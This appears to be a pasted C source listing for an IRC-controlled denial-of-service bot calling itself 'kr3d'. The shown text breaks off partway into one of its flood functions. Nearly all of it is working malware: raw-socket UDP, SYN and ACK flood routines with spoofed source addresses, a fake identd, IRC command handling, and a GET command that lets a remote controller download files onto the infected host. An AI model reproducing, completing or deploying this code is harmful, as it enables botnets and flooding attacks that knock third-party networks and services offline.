SHOW:
|
|
- or go back to the newest paste.
| 1 | /* | |
| 2 | denial of service irc bot. | |
| 3 | available commands: | |
| 4 | ||
| 5 | !* udp <target> <port> <time> | |
| 6 | !* syn <target> <port> <time> | |
| 7 | !* fin <target> <port> <time> | |
| 8 | !* psh <target> <port> <time> | |
| 9 | !* ack <target> <port> <time> | |
| 10 | !* urg <target> <port> <time> | |
| 11 | !* rst <target> <port> <time> | |
| 12 | !* ece <target> <port> <time> | |
| 13 | !* cwr <target> <port> <time> | |
| 14 | !* sew <target> <port> <time> | |
| 15 | !* xmas <target> <port> <time> | |
| 16 | !* unknown <target> <time> | |
| 17 | */ | |
| 18 | #undef STARTUP | |
| 19 | #undef IDENT | |
| 20 | #define FAKENAME "fakename" | |
| 21 | #define CHAN "#chan" | |
| 22 | #define KEY "key" | |
| 23 | int numservers=1; | |
| 24 | char *servers[] = {
| |
| 25 | "fbi.gov", | |
| 26 | (void*)0 | |
| 27 | }; | |
| 28 | #include <stdarg.h> | |
| 29 | #include <errno.h> | |
| 30 | #include <stdio.h> | |
| 31 | #include <stdlib.h> | |
| 32 | #include <string.h> | |
| 33 | #include <sys/types.h> | |
| 34 | #include <sys/stat.h> | |
| 35 | #include <fcntl.h> | |
| 36 | #include <strings.h> | |
| 37 | #include <netinet/in.h> | |
| 38 | #include <unistd.h> | |
| 39 | #include <sys/time.h> | |
| 40 | #include <sys/socket.h> | |
| 41 | #include <signal.h> | |
| 42 | #include <arpa/inet.h> | |
| 43 | #include <netdb.h> | |
| 44 | #include <time.h> | |
| 45 | #include <sys/wait.h> | |
| 46 | #include <sys/ioctl.h> | |
| 47 | int sock,changeservers=0; | |
| 48 | char *server, *chan, *key, *nick, *ident, *user, disabled=0, execfile[256],dispass[256]; | |
| 49 | unsigned int *pids; | |
| 50 | unsigned long spoofs=0, spoofsm=0, numpids=0; | |
| 51 | int strwildmatch(const char* pattern, const char* string) {
| |
| 52 | switch(*pattern) {
| |
| 53 | case '\0': return *string; | |
| 54 | case '*': return !(!strwildmatch(pattern+1, string) || *string && !strwildmatch(pattern, string+1)); | |
| 55 | case '?': return !(*string && !strwildmatch(pattern+1, string+1)); | |
| 56 | default: return !((toupper(*pattern) == toupper(*string)) && !strwildmatch(pattern+1, string+1)); | |
| 57 | } | |
| 58 | } | |
| 59 | int Send(int sock, char *words, ...) {
| |
| 60 | static char textBuffer[1024]; | |
| 61 | va_list args; | |
| 62 | va_start(args, words); | |
| 63 | vsprintf(textBuffer, words, args); | |
| 64 | va_end(args); | |
| 65 | return write(sock,textBuffer,strlen(textBuffer)); | |
| 66 | } | |
| 67 | int mfork(char *sender) {
| |
| 68 | unsigned int parent, *newpids, i; | |
| 69 | if (disabled == 1) {
| |
| 70 | Send(sock,"NOTICE %s :Unable to comply.\n",sender); | |
| 71 | return 1; | |
| 72 | } | |
| 73 | parent=fork(); | |
| 74 | if (parent <= 0) return parent; | |
| 75 | numpids++; | |
| 76 | newpids=(unsigned int*)malloc((numpids+1)*sizeof(unsigned int)); | |
| 77 | for (i=0;i<numpids-1;i++) newpids[i]=pids[i]; | |
| 78 | newpids[numpids-1]=parent; | |
| 79 | free(pids); | |
| 80 | pids=newpids; | |
| 81 | return parent; | |
| 82 | } | |
| 83 | unsigned long getspoof() {
| |
| 84 | if (!spoofs) return rand(); | |
| 85 | if (spoofsm == 1) return ntohl(spoofs); | |
| 86 | return ntohl(spoofs+(rand() % spoofsm)+1); | |
| 87 | } | |
| 88 | void filter(char *a) { while(a[strlen(a)-1] == '\r' || a[strlen(a)-1] == '\n') a[strlen(a)-1]=0; }
| |
| 89 | char *makestring() {
| |
| 90 | char *tmp; | |
| 91 | int len=13,i; | |
| 92 | tmp=(char*)malloc(len+1); | |
| 93 | memset(tmp,0,len+1); | |
| 94 | for (i=0;i<len;i++) tmp[i]=(rand()%(91-65))+65; | |
| 95 | tmp[0]='R'; | |
| 96 | tmp[1]='E'; | |
| 97 | tmp[2]='K'; | |
| 98 | tmp[3]='T'; | |
| 99 | tmp[4]='|'; | |
| 100 | return tmp; | |
| 101 | } | |
| 102 | void identd() {
| |
| 103 | int sockname,sockfd,sin_size,tmpsock,i; | |
| 104 | struct sockaddr_in my_addr,their_addr; | |
| 105 | char szBuffer[1024]; | |
| 106 | if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) return; | |
| 107 | my_addr.sin_family = AF_INET; | |
| 108 | my_addr.sin_port = htons(113); | |
| 109 | my_addr.sin_addr.s_addr = INADDR_ANY; | |
| 110 | memset(&(my_addr.sin_zero), 0, 8); | |
| 111 | if (bind(sockfd, (struct sockaddr *)&my_addr, sizeof(struct sockaddr)) == -1) return; | |
| 112 | if (listen(sockfd, 1) == -1) return; | |
| 113 | if (fork() == 0) return; | |
| 114 | sin_size = sizeof(struct sockaddr_in); | |
| 115 | if ((tmpsock = accept(sockfd, (struct sockaddr *)&their_addr, &sin_size)) == -1) exit(0); | |
| 116 | for(;;) {
| |
| 117 | fd_set bla; | |
| 118 | struct timeval timee; | |
| 119 | FD_ZERO(&bla); | |
| 120 | FD_SET(tmpsock,&bla); | |
| 121 | timee.tv_sec=timee.tv_usec=60; | |
| 122 | if (select(tmpsock + 1,&bla,(fd_set*)0,(fd_set*)0,&timee) < 0) exit(0); | |
| 123 | if (FD_ISSET(tmpsock,&bla)) break; | |
| 124 | } | |
| 125 | i = recv(tmpsock,szBuffer,1024,0); | |
| 126 | if (i <= 0 || i >= 20) exit(0); | |
| 127 | szBuffer[i]=0; | |
| 128 | if (szBuffer[i-1] == '\n' || szBuffer[i-1] == '\r') szBuffer[i-1]=0; | |
| 129 | if (szBuffer[i-2] == '\n' || szBuffer[i-2] == '\r') szBuffer[i-2]=0; | |
| 130 | Send(tmpsock,"%s : USERID : UNIX : %s\n",szBuffer,ident); | |
| 131 | close(tmpsock); | |
| 132 | close(sockfd); | |
| 133 | exit(0); | |
| 134 | } | |
| 135 | long pow(long a, long b) {
| |
| 136 | if (b == 0) return 1; | |
| 137 | if (b == 1) return a; | |
| 138 | return a*pow(a,b-1); | |
| 139 | } | |
| 140 | u_short in_cksum(u_short *addr, int len) {
| |
| 141 | register int nleft = len; | |
| 142 | register u_short *w = addr; | |
| 143 | register int sum = 0; | |
| 144 | u_short answer =0; | |
| 145 | while (nleft > 1) {
| |
| 146 | sum += *w++; | |
| 147 | nleft -= 2; | |
| 148 | } | |
| 149 | if (nleft == 1) {
| |
| 150 | *(u_char *)(&answer) = *(u_char *)w; | |
| 151 | sum += answer; | |
| 152 | } | |
| 153 | sum = (sum >> 16) + (sum & 0xffff); | |
| 154 | sum += (sum >> 16); | |
| 155 | answer = ~sum; | |
| 156 | return(answer); | |
| 157 | } | |
| 158 | void get(int sock, char *sender, int argc, char **argv) {
| |
| 159 | int sock2,i,d; | |
| 160 | struct sockaddr_in server; | |
| 161 | unsigned long ipaddr; | |
| 162 | char buf[1024]; | |
| 163 | FILE *file; | |
| 164 | unsigned char bufm[4096]; | |
| 165 | if (mfork(sender) != 0) return; | |
| 166 | if (argc < 2) {
| |
| 167 | Send(sock,"NOTICE %s :GET <host> <save as>\n",sender); | |
| 168 | exit(0); | |
| 169 | } | |
| 170 | if ((sock2 = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
| |
| 171 | Send(sock,"NOTICE %s :Unable to create socket.\n",sender); | |
| 172 | exit(0); | |
| 173 | } | |
| 174 | if (!strncmp(argv[1],"http://",7)) strcpy(buf,argv[1]+7); | |
| 175 | else strcpy(buf,argv[1]); | |
| 176 | for (i=0;i<strlen(buf) && buf[i] != '/';i++); | |
| 177 | buf[i]=0; | |
| 178 | server.sin_family = AF_INET; | |
| 179 | server.sin_port = htons(80); | |
| 180 | if ((ipaddr = inet_addr(buf)) == -1) {
| |
| 181 | struct hostent *hostm; | |
| 182 | if ((hostm=gethostbyname(buf)) == NULL) {
| |
| 183 | Send(sock,"NOTICE %s :Unable to resolve address.\n",sender); | |
| 184 | exit(0); | |
| 185 | } | |
| 186 | memcpy((char*)&server.sin_addr, hostm->h_addr, hostm->h_length); | |
| 187 | } | |
| 188 | else server.sin_addr.s_addr = ipaddr; | |
| 189 | memset(&(server.sin_zero), 0, 8); | |
| 190 | if (connect(sock2,(struct sockaddr *)&server, sizeof(server)) != 0) {
| |
| 191 | Send(sock,"NOTICE %s :Unable to connect to http.\n",sender); | |
| 192 | exit(0); | |
| 193 | } | |
| 194 | ||
| 195 | Send(sock2,"GET /%s HTTP/1.0\r\nConnection: Keep-Alive\r\nUser-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)\r\nHost: %s:80\r\nAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\r\nAccept-Encoding: gzip\r\nAccept-Language: en\r\nAccept-Charset: iso-8859-1,*,utf-8\r\n\r\n",buf+i+1,buf); | |
| 196 | Send(sock,"NOTICE %s :Receiving file.\n",sender); | |
| 197 | file=fopen(argv[2],"wb"); | |
| 198 | while(1) {
| |
| 199 | int i; | |
| 200 | if ((i=recv(sock2,bufm,4096,0)) <= 0) break; | |
| 201 | if (i < 4096) bufm[i]=0; | |
| 202 | for (d=0;d<i;d++) if (!strncmp(bufm+d,"\r\n\r\n",4)) {
| |
| 203 | for (d+=4;d<i;d++) fputc(bufm[d],file); | |
| 204 | goto done; | |
| 205 | } | |
| 206 | } | |
| 207 | done: | |
| 208 | Send(sock,"NOTICE %s :Saved as %s\n",sender,argv[2]); | |
| 209 | while(1) {
| |
| 210 | int i,d; | |
| 211 | if ((i=recv(sock2,bufm,4096,0)) <= 0) break; | |
| 212 | if (i < 4096) bufm[i]=0; | |
| 213 | for (d=0;d<i;d++) fputc(bufm[d],file); | |
| 214 | } | |
| 215 | fclose(file); | |
| 216 | close(sock2); | |
| 217 | exit(0); | |
| 218 | } | |
| 219 | void getspoofs(int sock, char *sender, int argc, char **argv) {
| |
| 220 | unsigned long a=spoofs,b=spoofs+(spoofsm-1); | |
| 221 | if (spoofsm == 1) Send(sock,"NOTICE %s :Spoofs: %d.%d.%d.%d\n",sender,((u_char*)&a)[3],((u_char*)&a)[2],((u_char*)&a)[1],((u_char*)&a)[0]); | |
| 222 | else Send(sock,"NOTICE %s :Spoofs: %d.%d.%d.%d - %d.%d.%d.%d\n",sender,((u_char*)&a)[3],((u_char*)&a)[2],((u_char*)&a)[1],((u_char*)&a)[0],((u_char*)&b)[3],((u_char*)&b)[2],((u_char*)&b)[1],((u_char*)&b)[0]); | |
| 223 | } | |
| 224 | void version(int sock, char *sender, int argc, char **argv) {
| |
| 225 | Send(sock,"NOTICE %s :kr3d. v0.666\n",sender); | |
| 226 | } | |
| 227 | void nickc(int sock, char *sender, int argc, char **argv) {
| |
| 228 | if (argc != 1) {
| |
| 229 | Send(sock,"NOTICE %s :NICK <nick>\n",sender); | |
| 230 | return; | |
| 231 | } | |
| 232 | if (strlen(argv[1]) >= 10) {
| |
| 233 | Send(sock,"NOTICE %s :Nick cannot be larger than 9 characters.\n",sender); | |
| 234 | return; | |
| 235 | } | |
| 236 | Send(sock,"NICK %s\n",argv[1]); | |
| 237 | } | |
| 238 | void disable(int sock, char *sender, int argc, char **argv) {
| |
| 239 | if (argc != 1) {
| |
| 240 | Send(sock,"NOTICE %s :DISABLE <pass>\n",sender); | |
| 241 | Send(sock,"NOTICE %s :Current status is: %s.\n",sender,disabled?"Disabled":"Enabled and awaiting orders"); | |
| 242 | return; | |
| 243 | } | |
| 244 | if (disabled) {
| |
| 245 | Send(sock,"NOTICE %s :Already disabled.\n",sender); | |
| 246 | return; | |
| 247 | } | |
| 248 | if (strlen(argv[1]) > 254) {
| |
| 249 | Send(sock,"NOTICE %s :Password too long! > 254\n",sender); | |
| 250 | return; | |
| 251 | } | |
| 252 | disabled=1; | |
| 253 | memset(dispass,0,256); | |
| 254 | strcpy(dispass,argv[1]); | |
| 255 | Send(sock,"NOTICE %s :Disable sucessful.\n"); | |
| 256 | } | |
| 257 | void enable(int sock, char *sender, int argc, char **argv) {
| |
| 258 | if (argc != 1) {
| |
| 259 | Send(sock,"NOTICE %s :ENABLE <pass>\n",sender); | |
| 260 | Send(sock,"NOTICE %s :Current status is: %s.\n",sender,disabled?"Disabled":"Enabled and awaiting orders"); | |
| 261 | return; | |
| 262 | } | |
| 263 | if (!disabled) {
| |
| 264 | Send(sock,"NOTICE %s :Already enabled.\n",sender); | |
| 265 | return; | |
| 266 | } | |
| 267 | if (strcasecmp(dispass,argv[1])) {
| |
| 268 | Send(sock,"NOTICE %s :Wrong password\n",sender); | |
| 269 | return; | |
| 270 | } | |
| 271 | disabled=0; | |
| 272 | Send(sock,"NOTICE %s :Password correct.\n",sender); | |
| 273 | } | |
| 274 | void spoof(int sock, char *sender, int argc, char **argv) {
| |
| 275 | char ip[256]; | |
| 276 | int i, num; | |
| 277 | unsigned long uip; | |
| 278 | if (argc != 1) {
| |
| 279 | Send(sock,"NOTICE %s :Removed all spoofs\n",sender); | |
| 280 | spoofs=0; | |
| 281 | spoofsm=0; | |
| 282 | return; | |
| 283 | } | |
| 284 | if (strlen(argv[1]) > 16) {
| |
| 285 | Send(sock,"NOTICE %s :What kind of subnet address is that? Do something like: 169.40\n",sender); | |
| 286 | return; | |
| 287 | } | |
| 288 | strcpy(ip,argv[1]); | |
| 289 | if (ip[strlen(ip)-1] == '.') ip[strlen(ip)-1] = 0; | |
| 290 | for (i=0, num=1;i<strlen(ip);i++) if (ip[i] == '.') num++; | |
| 291 | num=-(num-4); | |
| 292 | for (i=0;i<num;i++) strcat(ip,".0"); | |
| 293 | uip=inet_network(ip); | |
| 294 | if (num == 0) spoofsm=1; | |
| 295 | else spoofsm=pow(256,num); | |
| 296 | spoofs=uip; | |
| 297 | } | |
| 298 | struct iphdr {
| |
| 299 | unsigned int ihl:4, version:4; | |
| 300 | unsigned char tos; | |
| 301 | unsigned short tot_len; | |
| 302 | unsigned short id; | |
| 303 | unsigned short frag_off; | |
| 304 | unsigned char ttl; | |
| 305 | unsigned char protocol; | |
| 306 | unsigned short check; | |
| 307 | unsigned long saddr; | |
| 308 | unsigned long daddr; | |
| 309 | }; | |
| 310 | struct udphdr {
| |
| 311 | unsigned short source; | |
| 312 | unsigned short dest; | |
| 313 | unsigned short len; | |
| 314 | unsigned short check; | |
| 315 | }; | |
| 316 | struct tcphdr {
| |
| 317 | unsigned short source; | |
| 318 | unsigned short dest; | |
| 319 | unsigned long seq; | |
| 320 | unsigned long ack_seq; | |
| 321 | unsigned short res1:4, doff:4; | |
| 322 | unsigned char fin:1, syn:1, rst:1, psh:1, ack:1, urg:1, ece:1, cwr:1; | |
| 323 | unsigned short window; | |
| 324 | unsigned short check; | |
| 325 | unsigned short urg_ptr; | |
| 326 | }; | |
| 327 | struct send_tcp {
| |
| 328 | struct iphdr ip; | |
| 329 | struct tcphdr tcp; | |
| 330 | char buf[20]; | |
| 331 | }; | |
| 332 | struct pseudo_header {
| |
| 333 | unsigned int source_address; | |
| 334 | unsigned int dest_address; | |
| 335 | unsigned char placeholder; | |
| 336 | unsigned char protocol; | |
| 337 | unsigned short tcp_length; | |
| 338 | struct tcphdr tcp; | |
| 339 | char buf[20]; | |
| 340 | }; | |
| 341 | unsigned int host2ip(char *sender,char *hostname) {
| |
| 342 | static struct in_addr i; | |
| 343 | struct hostent *h; | |
| 344 | if((i.s_addr = inet_addr(hostname)) == -1) {
| |
| 345 | if((h = gethostbyname(hostname)) == NULL) {
| |
| 346 | Send(sock, "NOTICE %s :Unable to resolve %s\n", sender,hostname); | |
| 347 | exit(0); | |
| 348 | } | |
| 349 | bcopy(h->h_addr, (char *)&i.s_addr, h->h_length); | |
| 350 | } | |
| 351 | return i.s_addr; | |
| 352 | } | |
| 353 | void udp(int sock, char *sender, int argc, char **argv) {
| |
| 354 | unsigned int port,i=0; | |
| 355 | unsigned long psize,target,secs; | |
| 356 | struct sockaddr_in s_in; | |
| 357 | struct iphdr *ip; | |
| 358 | struct udphdr *udp; | |
| 359 | char buf[1500],*str; | |
| 360 | int get; | |
| 361 | time_t start=time(NULL); | |
| 362 | if (mfork(sender) != 0) return; | |
| 363 | if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1); | |
| 364 | if (argc < 3) {
| |
| 365 | Send(sock,"NOTICE %s :UDP <target> <port> <secs>\n",sender); | |
| 366 | exit(1); | |
| 367 | } | |
| 368 | target = host2ip(sender,argv[1]); | |
| 369 | port = atoi(argv[2]); | |
| 370 | secs = atol(argv[3]); | |
| 371 | ip=(void*)buf; | |
| 372 | udp=(void*)(buf+sizeof(struct iphdr)); | |
| 373 | str=(void*)(buf+sizeof(struct iphdr)+sizeof(struct udphdr)); | |
| 374 | memset(str,10,1500-(sizeof(struct iphdr)+sizeof(struct udphdr))); | |
| 375 | Send(sock,"NOTICE %s :Packeting %s.\n",sender,argv[1]); | |
| 376 | ip->ihl = 5; | |
| 377 | ip->version = 4; | |
| 378 | ip->tos = 0; | |
| 379 | ip->tot_len = 1500; | |
| 380 | ip->frag_off = 0; | |
| 381 | ip->protocol = 17; | |
| 382 | ip->ttl = 64; | |
| 383 | ip->daddr = target; | |
| 384 | udp->len = htons(psize); | |
| 385 | s_in.sin_family = AF_INET; | |
| 386 | s_in.sin_addr.s_addr = target; | |
| 387 | for (;;) {
| |
| 388 | udp->source = rand(); | |
| 389 | if (port) udp->dest = htons(port); | |
| 390 | else udp->dest = rand(); | |
| 391 | udp->check = in_cksum((u_short *)buf,1500); | |
| 392 | ip->saddr = getspoof(); | |
| 393 | ip->id = rand(); | |
| 394 | ip->check = in_cksum((u_short *)buf,1500); | |
| 395 | s_in.sin_port = udp->dest; | |
| 396 | sendto(get,buf,1500,0,(struct sockaddr *)&s_in,sizeof(s_in)); | |
| 397 | if (i >= 50) {
| |
| 398 | if (time(NULL) >= start+secs) exit(0); | |
| 399 | i=0; | |
| 400 | } | |
| 401 | i++; | |
| 402 | } | |
| 403 | } | |
| 404 | void syn(int sock, char *sender, int argc, char **argv) {
| |
| 405 | struct send_tcp send_tcp; | |
| 406 | struct pseudo_header pseudo_header; | |
| 407 | struct sockaddr_in sin; | |
| 408 | unsigned int syn[20] = { 2,4,5,180,4,2,8,10,0,0,0,0,0,0,0,0,1,3,3,0 }, a=0;
| |
| 409 | unsigned int psize=20, source, dest, check; | |
| 410 | unsigned long saddr, daddr,secs; | |
| 411 | int get; | |
| 412 | time_t start=time(NULL); | |
| 413 | if (mfork(sender) != 0) return; | |
| 414 | if (argc < 3) {
| |
| 415 | Send(sock,"NOTICE %s :SYN <target> <port> <secs>\n",sender); | |
| 416 | exit(1); | |
| 417 | } | |
| 418 | if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1); | |
| 419 | {int i; for(i=0;i<20;i++) send_tcp.buf[i]=(u_char)syn[i];}
| |
| 420 | daddr=host2ip(sender,argv[1]); | |
| 421 | secs=atol(argv[3]); | |
| 422 | dest=htons(atoi(argv[2])); | |
| 423 | Send(sock,"NOTICE %s :Packeting %s\n",sender,argv[1]); | |
| 424 | send_tcp.ip.ihl = 5; | |
| 425 | send_tcp.ip.version = 4; | |
| 426 | send_tcp.ip.tos = 16; | |
| 427 | send_tcp.ip.frag_off = 64; | |
| 428 | send_tcp.ip.ttl = 255; | |
| 429 | send_tcp.ip.protocol = 6; | |
| 430 | send_tcp.tcp.doff = 5; | |
| 431 | send_tcp.tcp.res1 = 0; | |
| 432 | send_tcp.tcp.cwr = 0; | |
| 433 | send_tcp.tcp.ece = 0; | |
| 434 | send_tcp.tcp.psh = 0; | |
| 435 | send_tcp.tcp.rst = 0; | |
| 436 | send_tcp.tcp.fin = 0; | |
| 437 | send_tcp.tcp.urg = 0; | |
| 438 | send_tcp.tcp.syn = 1; | |
| 439 | send_tcp.tcp.ack = 1; | |
| 440 | send_tcp.tcp.window = 30845; | |
| 441 | send_tcp.tcp.urg_ptr = 0; | |
| 442 | while(1) {
| |
| 443 | saddr=getspoof(); | |
| 444 | if (atoi(argv[2]) == 0) dest=rand(); | |
| 445 | send_tcp.ip.tot_len = htons(40+psize); | |
| 446 | send_tcp.ip.id = rand(); | |
| 447 | send_tcp.ip.check = 0; | |
| 448 | send_tcp.ip.saddr = saddr; | |
| 449 | send_tcp.ip.daddr = daddr; | |
| 450 | send_tcp.tcp.source = rand(); | |
| 451 | send_tcp.tcp.dest = dest; | |
| 452 | send_tcp.tcp.seq = rand(); | |
| 453 | send_tcp.tcp.ack_seq = rand(); | |
| 454 | send_tcp.tcp.check = 0; | |
| 455 | sin.sin_family = AF_INET; | |
| 456 | sin.sin_port = send_tcp.tcp.dest; | |
| 457 | sin.sin_addr.s_addr = send_tcp.ip.daddr; | |
| 458 | send_tcp.ip.check = in_cksum((unsigned short *)&send_tcp.ip, 20); | |
| 459 | check = in_cksum((unsigned short *)&send_tcp, 40); | |
| 460 | pseudo_header.source_address = send_tcp.ip.saddr; | |
| 461 | pseudo_header.dest_address = send_tcp.ip.daddr; | |
| 462 | pseudo_header.placeholder = 0; | |
| 463 | pseudo_header.protocol = IPPROTO_TCP; | |
| 464 | pseudo_header.tcp_length = htons(20+psize); | |
| 465 | bcopy((char *)&send_tcp.tcp, (char *)&pseudo_header.tcp, 20); | |
| 466 | bcopy((char *)&send_tcp.buf, (char *)&pseudo_header.buf, psize); | |
| 467 | send_tcp.tcp.check = in_cksum((unsigned short *)&pseudo_header, 32+psize); | |
| 468 | sendto(get, &send_tcp, 40+psize, 0, (struct sockaddr *)&sin, sizeof(sin)); | |
| 469 | if (a >= 50) {
| |
| 470 | if (time(NULL) >= start+secs) exit(0); | |
| 471 | a=0; | |
| 472 | } | |
| 473 | a++; | |
| 474 | } | |
| 475 | close(get); | |
| 476 | exit(0); | |
| 477 | } | |
| 478 | void nssyn(int sock, char *sender, int argc, char **argv) {
| |
| 479 | struct send_tcp send_tcp; | |
| 480 | struct pseudo_header pseudo_header; | |
| 481 | struct sockaddr_in sin; | |
| 482 | unsigned int syn[20] = { 2,4,5,180,4,2,8,10,0,0,0,0,0,0,0,0,1,3,3,0 }, a=0;
| |
| 483 | unsigned int psize=20, source, dest, check; | |
| 484 | unsigned long saddr, daddr,secs; | |
| 485 | int get; | |
| 486 | time_t start=time(NULL); | |
| 487 | if (mfork(sender) != 0) return; | |
| 488 | if (argc < 3) {
| |
| 489 | Send(sock,"NOTICE %s :NSSYN <target> <port> <secs>\n",sender); | |
| 490 | exit(1); | |
| 491 | } | |
| 492 | if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1); | |
| 493 | {int i; for(i=0;i<20;i++) send_tcp.buf[i]=(u_char)syn[i];}
| |
| 494 | daddr=host2ip(sender,argv[1]); | |
| 495 | secs=atol(argv[3]); | |
| 496 | Send(sock,"NOTICE %s :Packeting %s \n",sender,argv[1]); | |
| 497 | send_tcp.ip.ihl = 5; | |
| 498 | send_tcp.ip.version = 4; | |
| 499 | send_tcp.ip.tos = 16; | |
| 500 | send_tcp.ip.frag_off = 64; | |
| 501 | send_tcp.ip.ttl = 64; | |
| 502 | send_tcp.ip.protocol = 6; | |
| 503 | send_tcp.tcp.ack_seq = 0; | |
| 504 | send_tcp.tcp.doff = 10; | |
| 505 | send_tcp.tcp.res1 = 0; | |
| 506 | send_tcp.tcp.cwr = 0; | |
| 507 | send_tcp.tcp.ece = 0; | |
| 508 | send_tcp.tcp.urg = 0; | |
| 509 | send_tcp.tcp.ack = 0; | |
| 510 | send_tcp.tcp.psh = 0; | |
| 511 | send_tcp.tcp.rst = 0; | |
| 512 | send_tcp.tcp.fin = 0; | |
| 513 | send_tcp.tcp.syn = 1; | |
| 514 | send_tcp.tcp.window = 30845; | |
| 515 | send_tcp.tcp.urg_ptr = 0; | |
| 516 | dest=htons(atoi(argv[2])); | |
| 517 | while(1) {
| |
| 518 | source=rand(); | |
| 519 | if (atoi(argv[2]) == 0) dest=rand(); | |
| 520 | saddr=INADDR_ANY; | |
| 521 | send_tcp.ip.tot_len = htons(40+psize); | |
| 522 | send_tcp.ip.id = rand(); | |
| 523 | send_tcp.ip.saddr = saddr; | |
| 524 | send_tcp.ip.daddr = daddr; | |
| 525 | send_tcp.ip.check = 0; | |
| 526 | send_tcp.tcp.source = source; | |
| 527 | send_tcp.tcp.dest = dest; | |
| 528 | send_tcp.tcp.seq = rand(); | |
| 529 | send_tcp.tcp.check = 0; | |
| 530 | sin.sin_family = AF_INET; | |
| 531 | sin.sin_port = dest; | |
| 532 | sin.sin_addr.s_addr = send_tcp.ip.daddr; | |
| 533 | send_tcp.ip.check = in_cksum((unsigned short *)&send_tcp.ip, 20); | |
| 534 | check = rand(); | |
| 535 | send_tcp.buf[9]=((char*)&check)[0]; | |
| 536 | send_tcp.buf[10]=((char*)&check)[1]; | |
| 537 | send_tcp.buf[11]=((char*)&check)[2]; | |
| 538 | send_tcp.buf[12]=((char*)&check)[3]; | |
| 539 | pseudo_header.source_address = send_tcp.ip.saddr; | |
| 540 | pseudo_header.dest_address = send_tcp.ip.daddr; | |
| 541 | pseudo_header.placeholder = 0; | |
| 542 | pseudo_header.protocol = IPPROTO_TCP; | |
| 543 | pseudo_header.tcp_length = htons(20+psize); | |
| 544 | bcopy((char *)&send_tcp.tcp, (char *)&pseudo_header.tcp, 20); | |
| 545 | bcopy((char *)&send_tcp.buf, (char *)&pseudo_header.buf, psize); | |
| 546 | send_tcp.tcp.check = in_cksum((unsigned short *)&pseudo_header, 32+psize); | |
| 547 | sendto(get, &send_tcp, 40+psize, 0, (struct sockaddr *)&sin, sizeof(sin)); | |
| 548 | if (a >= 50) {
| |
| 549 | if (time(NULL) >= start+secs) exit(0); | |
| 550 | a=0; | |
| 551 | } | |
| 552 | a++; | |
| 553 | } | |
| 554 | close(get); | |
| 555 | exit(0); | |
| 556 | } | |
| 557 | void ack(int sock, char *sender, int argc, char **argv) {
| |
| 558 | struct send_tcp send_tcp; | |
| 559 | struct pseudo_header pseudo_header; | |
| 560 | struct sockaddr_in sin; | |
| 561 | unsigned int syn[20] = { 2,4,5,180,4,2,8,10,0,0,0,0,0,0,0,0,1,3,3,0 }, a=0;
| |
| 562 | unsigned int psize=20, source, dest, check; | |
| 563 | unsigned long saddr, daddr,secs; | |
| 564 | int get; | |
| 565 | time_t start=time(NULL); | |
| 566 | if (mfork(sender) != 0) return; | |
| 567 | if (argc < 3) {
| |
| 568 | Send(sock,"NOTICE %s :ACK <target> <port> <secs>\n",sender); | |
| 569 | exit(1); | |
| 570 | } | |
| 571 | if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1); | |
| 572 | {int i; for(i=0;i<20;i++) send_tcp.buf[i]=(u_char)syn[i];}
| |
| 573 | daddr=host2ip(sender,argv[1]); | |
| 574 | secs=atol(argv[3]); | |
| 575 | dest=htons(atoi(argv[2])); | |
| 576 | Send(sock,"NOTICE %s :Packeting %s\n",sender,argv[1]); | |
| 577 | send_tcp.ip.ihl = 5; | |
| 578 | send_tcp.ip.version = 4; | |
| 579 | send_tcp.ip.tos = 16; | |
| 580 | send_tcp.ip.frag_off = 64; | |
| 581 | send_tcp.ip.ttl = 255; | |
| 582 | send_tcp.ip.protocol = 6; | |
| 583 | send_tcp.tcp.doff = 5; | |
| 584 | send_tcp.tcp.res1 = 0; | |
| 585 | send_tcp.tcp.cwr = 0; | |
| 586 | send_tcp.tcp.ece = 0; | |
| 587 | send_tcp.tcp.urg = 0; | |
| 588 | send_tcp.tcp.ack = 1; | |
| 589 | send_tcp.tcp.psh = 1; | |
| 590 | send_tcp.tcp.rst = 0; | |
| 591 | send_tcp.tcp.fin = 0; | |
| 592 | send_tcp.tcp.syn = 0; | |
| 593 | send_tcp.tcp.window = 30845; | |
| 594 | send_tcp.tcp.urg_ptr = 0; | |
| 595 | while(1) {
| |
| 596 | saddr=getspoof(); | |
| 597 | if (atoi(argv[2]) == 0) dest=rand(); | |
| 598 | send_tcp.ip.tot_len = htons(40+psize); | |
| 599 | send_tcp.ip.id = rand(); | |
| 600 | send_tcp.ip.check = 0; | |
| 601 | send_tcp.ip.saddr = saddr; | |
| 602 | send_tcp.ip.daddr = daddr; | |
| 603 | send_tcp.tcp.source = rand(); | |
| 604 | send_tcp.tcp.dest = dest; | |
| 605 | send_tcp.tcp.seq = rand(); | |
| 606 | send_tcp.tcp.ack_seq = rand(); | |
| 607 | send_tcp.tcp.check = 0; | |
| 608 | sin.sin_family = AF_INET; | |
| 609 | sin.sin_port = send_tcp.tcp.dest; | |
| 610 | sin.sin_addr.s_addr = send_tcp.ip.daddr; | |
| 611 | send_tcp.ip.check = in_cksum((unsigned short *)&send_tcp.ip, 20); | |
| 612 | check = in_cksum((unsigned short *)&send_tcp, 40); | |
| 613 | pseudo_header.source_address = send_tcp.ip.saddr; | |
| 614 | pseudo_header.dest_address = send_tcp.ip.daddr; | |
| 615 | pseudo_header.placeholder = 0; | |
| 616 | pseudo_header.protocol = IPPROTO_TCP; | |
| 617 | pseudo_header.tcp_length = htons(20+psize); | |
| 618 | bcopy((char *)&send_tcp.tcp, (char *)&pseudo_header.tcp, 20); | |
| 619 | bcopy((char *)&send_tcp.buf, (char *)&pseudo_header.buf, psize); | |
| 620 | send_tcp.tcp.check = in_cksum((unsigned short *)&pseudo_header, 32+psize); | |
| 621 | sendto(get, &send_tcp, 40+psize, 0, (struct sockaddr *)&sin, sizeof(sin)); | |
| 622 | if (a >= 50) {
| |
| 623 | if (time(NULL) >= start+secs) exit(0); | |
| 624 | a=0; | |
| 625 | } | |
| 626 | a++; | |
| 627 | } | |
| 628 | close(get); | |
| 629 | exit(0); | |
| 630 | } | |
| 631 | void sew(int sock, char *sender, int argc, char **argv) {
